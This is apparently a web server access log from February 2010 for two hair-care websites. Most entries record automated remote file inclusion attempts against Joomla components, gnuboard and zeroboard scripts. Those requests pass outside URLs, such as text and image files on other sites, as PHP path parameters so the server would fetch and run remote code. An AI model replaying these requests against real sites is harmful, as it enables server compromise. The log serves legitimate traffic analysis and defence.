218.38.136.125 - - [08/Feb/2010:01:57:48 -0800] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.235.54.152 - - [08/Feb/2010:01:58:04 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cmhaniagara.ca/video/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.235.54.152 - - [08/Feb/2010:01:58:04 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cmhaniagara.ca/video/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.235.54.152 - - [08/Feb/2010:01:58:04 -0800] "GET /logs/access_100111.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cmhaniagara.ca/video/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:01:59:47 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:01:59:47 -0800] "GET /logs/access_100118.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:01:59:47 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 927 "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:02:01:13 -0800] "GET /logs/access_100118.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:02:01:13 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:02:01:13 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4808 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:02:01:39 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 927 "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.38.136.126 - - [08/Feb/2010:02:01:39 -0800] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.38.136.126 - - [08/Feb/2010:02:01:39 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.38.136.126 - - [08/Feb/2010:02:01:49 -0800] "GET /logs/access_100111.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:02:03:04 -0800] "GET /logs/access_100118.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:02:03:19 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 927 "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.38.136.126 - - [08/Feb/2010:02:03:19 -0800] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.38.136.126 - - [08/Feb/2010:02:03:19 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.172.33.230 - - [08/Feb/2010:02:03:37 -0800] "GET /logs/access_100111.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:02:04:02 -0800] "GET /logs//bbs/skin/ggambo7002_board/setup.php//skin/ggambo7002_board/write.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:02:04:02 -0800] "GET /logs/access.log%20%20//bbs/skin/ggambo7002_board/setup.php//skin/ggambo7002_board/write.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:02:04:02 -0800] "GET /bbs/skin/ggambo7002_board/setup.php//skin/ggambo7002_board/write.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.38.136.126 - - [08/Feb/2010:02:05:43 -0800] "GET /logs/access_100111.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.7.58 - - [08/Feb/2010:02:06:09 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14098 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:02:07:21 -0800] "GET //skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:02:07:24 -0800] "GET /logs/access.log%20%20///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:02:07:24 -0800] "GET /logs///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.149.110.210 - - [08/Feb/2010:02:07:43 -0800] "GET /logs/access.log%20%20/tail.php?g4[path]=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.149.110.210 - - [08/Feb/2010:02:07:43 -0800] "GET /logs/tail.php?g4[path]=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.149.110.210 - - [08/Feb/2010:02:07:43 -0800] "GET /tail.php?g4[path]=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.250.124.252 - - [08/Feb/2010:02:07:47 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.250.124.252 - - [08/Feb/2010:02:07:47 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.250.124.252 - - [08/Feb/2010:02:07:48 -0800] "GET /logs/access_100111.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:02:08:49 -0800] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_admin_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.176.226.164 - - [08/Feb/2010:02:08:49 -0800] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_admin_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.176.226.164 - - [08/Feb/2010:02:08:49 -0800] "GET /logs/access.log%20%20//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_admin_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:02:12:37 -0800] "GET /logs/access.log//bbs/skin/ggambo7002_board/setup.php//skin/ggambo7002_board/write.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:02:13:45 -0800] "GET /logs/access_100118.log//bbs/skin/ggambo7002_board/setup.php//skin/ggambo7002_board/write.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.80.193.27 - - [08/Feb/2010:02:13:46 -0800] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; BTinternet V8.4; H010818; YPC 3.2.0; yplus 5.3.04b)" "growlonghairfast.com"
64.235.54.152 - - [08/Feb/2010:02:15:32 -0800] "GET /logs/access_100111.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cmhaniagara.ca/video/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:02:16:21 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 927 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:02:16:21 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:02:16:29 -0800] "GET /logs/access_100118.log////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:02:19:12 -0800] "GET /logs/access_091207.log///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:02:19:12 -0800] "GET /logs///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:02:19:13 -0800] "GET //skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.239.227.34 - - [08/Feb/2010:02:19:36 -0800] "GET /gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.239.227.34 - - [08/Feb/2010:02:19:36 -0800] "GET /logs/access.log//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.239.227.34 - - [08/Feb/2010:02:19:36 -0800] "GET /logs//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.239.227.34 - - [08/Feb/2010:02:19:40 -0800] "GET /logs//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.239.227.34 - - [08/Feb/2010:02:19:40 -0800] "GET /logs/access.log//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.239.227.34 - - [08/Feb/2010:02:19:40 -0800] "GET /gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.149.110.210 - - [08/Feb/2010:02:20:07 -0800] "GET /logs/access.log/tail.php?g4[path]=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.80.28.48 - - [08/Feb/2010:02:22:42 -0800] "GET /freehairsecretsphp/index.php+%28200+ok%29+ACCEPTED HTTP/1.0" 404 - "http://www.freehairsecrets.com/freehairsecretsphp/index.php+%28200+ok%29+ACCEPTED" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0" "www.freehairsecrets.com"
93.80.28.48 - - [08/Feb/2010:02:22:42 -0800] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0" "www.freehairsecrets.com"
210.116.103.118 - - [08/Feb/2010:02:28:58 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cmhaniagara.ca/video/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.116.103.118 - - [08/Feb/2010:02:28:58 -0800] "GET /logs/access_100111.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cmhaniagara.ca/video/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.116.103.118 - - [08/Feb/2010:02:29:01 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cmhaniagara.ca/video/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [08/Feb/2010:02:30:15 -0800] "GET /tmp/ HTTP/1.1" 200 659 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
78.26.179.4 - - [08/Feb/2010:02:33:02 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "growlonghairfast.com"
78.26.179.4 - - [08/Feb/2010:02:33:02 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:02:33:33 -0800] "GET /ask_password.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:02:33:33 -0800] "GET /logs/access_091123.log%20%20//ask_password.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:02:33:33 -0800] "GET /logs//ask_password.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:02:34:32 -0800] "GET /logs/access_091207.log%20%20//ask_password.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.129.119.12 - - [08/Feb/2010:02:34:33 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
114.80.93.71 - - [08/Feb/2010:02:36:53 -0800] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
81.176.226.164 - - [08/Feb/2010:02:38:11 -0800] "GET /logs/access_091123.log//ask_password.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:02:38:36 -0800] "GET /logs/access_091207.log//ask_password.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:02:44:50 -0800] "GET /logs///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:02:44:50 -0800] "GET /logs/access.log%20%20///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:02:44:50 -0800] "GET //skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.80.193.29 - - [08/Feb/2010:02:46:20 -0800] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {B5615F76-194F-44A7-0ABB-A5E5B49B1577}; .NET CLR 1.1.4322)" "freehairsecrets.com"
67.195.115.235 - - [08/Feb/2010:02:50:04 -0800] "GET /logs/access_100104.log HTTP/1.0" 200 553567 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
117.74.98.18 - - [08/Feb/2010:02:50:42 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.iixiah.com/ix/skin/amick04_red/image/w0???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
117.74.98.18 - - [08/Feb/2010:02:50:42 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.iixiah.com/ix/skin/amick04_red/image/w0???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
117.74.98.18 - - [08/Feb/2010:02:50:42 -0800] "GET /logs/access.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.iixiah.com/ix/skin/amick04_red/image/w0???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.73.161.132 - - [08/Feb/2010:02:50:46 -0800] "GET ////bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.73.161.132 - - [08/Feb/2010:02:50:47 -0800] "GET /logs/////bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.73.161.132 - - [08/Feb/2010:02:50:47 -0800] "GET /logs/access_100118.log/////bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.96.207.207 - - [08/Feb/2010:02:51:19 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.showusyawheels.com.au/admin/templates/ph.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.96.207.207 - - [08/Feb/2010:02:51:19 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.showusyawheels.com.au/admin/templates/ph.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.96.207.207 - - [08/Feb/2010:02:51:19 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.showusyawheels.com.au/admin/templates/ph.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
117.74.98.18 - - [08/Feb/2010:02:51:29 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.iixiah.com/ix/skin/amick04_red/image/w0???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
117.74.98.18 - - [08/Feb/2010:02:51:29 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.iixiah.com/ix/skin/amick04_red/image/w0???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
117.74.98.18 - - [08/Feb/2010:02:51:29 -0800] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.iixiah.com/ix/skin/amick04_red/image/w0???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.73.17.7 - - [08/Feb/2010:02:59:57 -0800] "GET /logs/access_091221.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.73.17.7 - - [08/Feb/2010:03:00:02 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.73.17.7 - - [08/Feb/2010:03:00:02 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:00:40 -0800] "GET /bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [08/Feb/2010:03:00:40 -0800] "GET /logs/access.log%20%20//bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [08/Feb/2010:03:00:40 -0800] "GET /logs//bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
117.74.98.18 - - [08/Feb/2010:03:00:41 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.iixiah.com/ix/skin/amick04_red/image/w0???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
117.74.98.18 - - [08/Feb/2010:03:00:41 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.iixiah.com/ix/skin/amick04_red/image/w0???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
117.74.98.18 - - [08/Feb/2010:03:00:41 -0800] "GET /logs/access_100111.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.iixiah.com/ix/skin/amick04_red/image/w0???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.72.86 - - [08/Feb/2010:03:00:54 -0800] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.72.86 - - [08/Feb/2010:03:00:54 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.72.86 - - [08/Feb/2010:03:00:54 -0800] "GET /skin/zero_vote/error.php?dir=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.1.150.2 - - [08/Feb/2010:03:01:12 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.1.150.2 - - [08/Feb/2010:03:01:12 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.1.150.2 - - [08/Feb/2010:03:01:12 -0800] "GET /logs/access_091221.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
117.74.98.18 - - [08/Feb/2010:03:01:15 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.iixiah.com/ix/skin/amick04_red/image/w0???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
117.74.98.18 - - [08/Feb/2010:03:01:15 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.iixiah.com/ix/skin/amick04_red/image/w0???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
117.74.98.18 - - [08/Feb/2010:03:01:15 -0800] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.iixiah.com/ix/skin/amick04_red/image/w0???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.70.72.86 - - [08/Feb/2010:03:02:26 -0800] "GET /logs/access_091214.log%20%20//skin/zero_vote/error.php?dir=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:03:11 -0800] "GET /bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [08/Feb/2010:03:03:11 -0800] "GET /logs/access.log%20%20//bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [08/Feb/2010:03:03:11 -0800] "GET /logs//bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [08/Feb/2010:03:03:13 -0800] "GET /logs//bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [08/Feb/2010:03:03:13 -0800] "GET /bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [08/Feb/2010:03:03:13 -0800] "GET /logs/access.log%20%20//bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.1.150.2 - - [08/Feb/2010:03:04:01 -0800] "GET /logs/access_091221.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.1.150.2 - - [08/Feb/2010:03:04:01 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.1.150.2 - - [08/Feb/2010:03:04:01 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.73.17.7 - - [08/Feb/2010:03:04:14 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
